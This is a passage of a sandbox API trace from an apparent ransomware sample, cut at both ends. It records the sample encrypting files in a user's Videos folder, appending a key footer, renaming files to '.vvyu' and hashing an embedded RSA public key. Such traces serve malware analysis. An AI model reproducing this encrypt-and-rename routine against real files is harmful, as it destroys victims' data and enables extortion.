(HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1458 [0195.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c90 [0195.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2cc0 [0195.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d20 [0195.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2cd8 [0195.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0195.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0195.517] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0195.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea4a68 [0195.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cc0 | out: hHeap=0x620000) returned 1 [0195.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cd8 | out: hHeap=0x620000) returned 1 [0195.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d20 | out: hHeap=0x620000) returned 1 [0195.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0195.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d20 [0195.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0195.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2cd8 [0195.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0195.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2cc0 [0195.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0195.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0195.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0195.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0195.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0195.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0195.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0195.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0195.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0195.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cd8 | out: hHeap=0x620000) returned 1 [0195.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0195.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cc0 | out: hHeap=0x620000) returned 1 [0195.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0195.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0195.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d20 | out: hHeap=0x620000) returned 1 [0195.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0195.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0195.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0195.520] GetCurrentThreadId () returned 0x66c [0195.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0195.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea0850 [0195.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0195.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0195.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0195.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0195.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0195.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0195.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.521] GetCurrentThreadId () returned 0x66c [0195.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0195.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0195.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0195.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0195.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccace8 [0195.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0195.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0195.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0195.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d20 [0195.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0195.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0195.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0195.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0195.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0195.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0195.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0195.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0195.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2cc0 [0195.524] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0195.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0195.524] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0195.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0195.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0195.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0195.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0195.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2cd8 [0195.524] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0195.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0195.524] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0195.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ca8 [0195.524] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0195.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d38 [0195.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0195.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0195.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0195.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d08 [0195.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0195.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2cf0 [0195.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0195.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d50 [0195.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cf0 | out: hHeap=0x620000) returned 1 [0195.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2cf0 [0195.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d08 | out: hHeap=0x620000) returned 1 [0195.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0195.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0195.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0195.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0195.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0195.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cc0 | out: hHeap=0x620000) returned 1 [0195.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2cc0 [0195.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0195.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea4a68 [0195.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d20 | out: hHeap=0x620000) returned 1 [0195.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0195.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d50 | out: hHeap=0x620000) returned 1 [0195.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea4c78 [0195.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0195.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0195.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0195.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0195.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cc0 | out: hHeap=0x620000) returned 1 [0195.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea4e90 [0195.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0195.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0195.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0195.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0195.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0195.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0195.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0195.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0195.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4c78 | out: hHeap=0x620000) returned 1 [0195.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4e90 | out: hHeap=0x620000) returned 1 [0195.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0195.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0195.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cf0 | out: hHeap=0x620000) returned 1 [0195.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0195.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d38 | out: hHeap=0x620000) returned 1 [0195.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0195.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cd8 | out: hHeap=0x620000) returned 1 [0195.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ca8 | out: hHeap=0x620000) returned 1 [0195.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0195.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0195.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0195.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c90 | out: hHeap=0x620000) returned 1 [0195.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1458 | out: hHeap=0x620000) returned 1 [0195.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0195.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0195.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0195.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0195.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0195.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0195.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0195.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0195.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0195.533] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x11389, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x11389, lpOverlapped=0x0) returned 1 [0195.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0195.534] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x1138e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.535] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0195.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0195.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea4a68 [0195.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea4a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea4e98 [0195.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.536] WriteFile (in: hFile=0x568, lpBuffer=0x2ea4e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea4e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0195.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4e98 | out: hHeap=0x620000) returned 1 [0195.536] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.536] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0195.536] CloseHandle (hObject=0x568) returned 1 [0195.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0195.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2ea4a68 [0195.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0195.538] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\K0ZMIj7SN.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\k0zmij7sn.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\K0ZMIj7SN.mp4.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\k0zmij7sn.mp4.vvyu")) returned 1 [0195.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0195.540] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0195.544] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa751f480, ftCreationTime.dwHighDateTime=0x1d8a620, ftLastAccessTime.dwLowDateTime=0x20a96cf0, ftLastAccessTime.dwHighDateTime=0x1d8a6b7, ftLastWriteTime.dwLowDateTime=0x20a96cf0, ftLastWriteTime.dwHighDateTime=0x1d8a6b7, nFileSizeHigh=0x0, nFileSizeLow=0x132b5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SipikwOFNhn.swf", cAlternateFileName="SIPIKW~1.SWF")) returned 1 [0195.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1458 [0195.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0195.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1458 | out: hHeap=0x620000) returned 1 [0195.544] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\SipikwOFNhn.swf") returned=".swf" [0195.544] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\SipikwOFNhn.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\sipikwofnhn.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0195.545] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=78517) returned 1 [0195.545] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0195.547] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x1328f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.547] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0195.552] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0195.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0195.553] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.553] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x132b5, lpOverlapped=0x0) returned 1 [0195.554] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.554] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0195.554] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.554] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.554] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0195.556] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0195.556] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.556] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0195.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0195.556] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0195.556] GetLastError () returned 0x0 [0195.556] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0195.556] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0195.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0195.556] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0195.556] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0195.557] RtlAllocateHeap (HeapHandle=0x620000, 